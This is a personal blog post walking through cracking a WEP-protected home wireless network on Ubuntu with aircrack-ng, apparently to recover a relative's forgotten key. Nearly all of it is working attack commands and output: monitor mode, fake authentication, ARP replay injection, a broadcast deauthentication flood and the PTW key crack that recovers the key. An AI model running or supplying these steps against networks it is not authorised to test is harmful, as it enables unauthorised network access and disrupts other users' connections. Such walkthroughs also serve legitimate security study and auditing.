My IT-blog

Hacking WEP encryption on Ubuntu

The information below is not intended to harm other people. Cracking other peoples network is considered illegal in most countries!!
Last day, my sister called me up because she couldn’t connect to her wireless network any more.
She was playing with her network connections and broke everything. She didn’t know the key for her wireless access point and the access point couldn’t be reset because it’s on the attic and we couldn’t reach it.

So I thought I give it a try to hack the access point.
Here are the steps I followed:
First I took a look if my laptop could see the wireless network.
The network I want to crack is wifi9/7

Let’s start cracking the key with the installation of aircrack-ng

sudo apt-get install aircrack-ng

List the adapters

wim@wim-ubuntu:~$ sudo airmon-ng 

Interface	Chipset		Driver

wlan0		Intel 3945ABG	iwl3945 - [phy0]

I have only one wireless card in my laptop (wlan0) so this is obviously the card I have to use.
Next, I have to put my wireless card in monitoring mode

wim@wim-ubuntu:~$ sudo airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
899	NetworkManager
906	avahi-daemon
977	avahi-daemon
1113	wpa_supplicant
2744	dhclient
Process with PID 2744 (dhclient) is running on interface wlan0

Interface	Chipset		Driver

wlan0		Intel 3945ABG	iwl3945 - [phy0]
				(monitor mode enabled on mon0)

mon0 is a new interface which I will use for monitoring. If I run the previous command again, mon0 should be listed as interface.

wim@wim-ubuntu:~$ sudo airmon-ng 

Interface	Chipset		Driver

wlan0		Intel 3945ABG	iwl3945 - [phy0]
mon0		Intel 3945ABG	iwl3945 - [phy0]

Next, launch airodump on the new interface to hop all the channels and show the wireless networks that can be found:

wim@wim-ubuntu:~$ sudo airodump-ng mon0            

 CH  2 ][ Elapsed: 24 s ][ 2010-02-08 19:43                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                             

 00:21:91:F2:06:D9   -1        0        0    0 123  -1
 00:1D:7E:43:52:33  -48       61       52    2   1  54e  WPA2 CCMP   PSK  cisco
 00:1B:11:6E:78:6D  -79       72        0    0   9  54   WEP  WEP         wifi6-2
 00:24:01:65:97:69  -79       54        0    0   6  54   WEP  WEP         wifi9/7
 00:1D:19:23:BC:57  -84       19       14    0   9  54 . WPA2 CCMP   PSK  GCS
 00:23:EE:CB:5A:61  -87       10        1    0  11  54e  WPA  TKIP   PSK  telenet-039FF
 00:21:91:F3:7D:B6  -88        4        0    0   9  54   WEP  WEP         WIFI 18                                                                           

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                   

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -83    0 - 1      0       39  baranilew,bbox2-b0c7,default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0   54e-54e     0       49  cisco

The network I like to hack (wifi9/7) is listed. I can see that it is secured by WEP. If the security is WPA, it's a lot harder to crack.

Next, run airodump-ng again, but now, let it look at the channel which is used by the network we will crack. In this case 6

wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 mon0

 CH  6 ][ Elapsed: 16 s ][ 2010-02-08 19:51 ][ fixed channel mon0: 1                       

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID        

 00:21:91:F2:06:D9   -1   0        0        0    0 133  -1
 00:1D:7E:43:52:33  -34   1       10        1    0   1  54e  WPA2 CCMP   PSK  cisco
 00:24:01:65:97:69  -75  96      117        0    0   6  54   WEP  WEP         wifi9/7      

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                 

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -85    0 - 5      0        7  default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0    1e- 1      0       10  cisco

Just let the previous screen run and open a new consolewindow to run a fake attempt for authentication.
The value after -a is the MAC-address from the network we want to crack, the -e value is the name of the network

wim@wim-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
19:56:24  Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6

19:56:24  Sending Authentication Request (Open System) [ACK]
19:56:24  Authentication successful
19:56:24  Sending Association Request [ACK]
19:56:24  Association successful   (AID: 1)

The association is successfull. This means the target host doesn’t use MAC filtering. This is good for me, so I don’t have to spoof my MAC address.
Now everything is ready to crack the key.
first, if in your first console the airdump command is still running, close it and start it again with an option to save the output to a file:

wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 -w /home/wim/crackwepwifi -i mon0

 CH  6 ][ Elapsed: 0 s ][ 2010-02-08 20:01                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID        

 00:24:01:65:97:69  -72 100       29        4    0   6  54   WEP  WEP         wifi9/7      

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

To actually crack the key, I need a lot of data. In this case, I've only got 4 packets where I need around 100000 so I have to speed things up a little bit by launching aireplay in injection mode in a new console window:

wim@wim-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
20:07:31  Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
Saving ARP requests in replay_arp-0208-200731.cap
You should also start airodump-ng to capture replies.
Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Now keep the aireplay-ng and airodump-ng running and run the deauth attack.

wim@wim-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0
20:10:02  Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:10:02  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:02  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]

Let everything run. After a few minutes, you should receive ARP requests and the data will start increasing very feast. I’ve noticed, it goes a little bit faster when I tried to connect in Ubuntu with the target network.
When there are enough packets captured, it’s time to crack them.
I’ve opened a new console and used following command where crackwepwifi-02.ivs is the file we entered previously:

wim@wim-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.ivs
Opening /home/wim/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
                     KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
	Decrypted correctly: 100%

Got it! The key for the network is 06469.
I could connect to it without a problem and made my sister happy again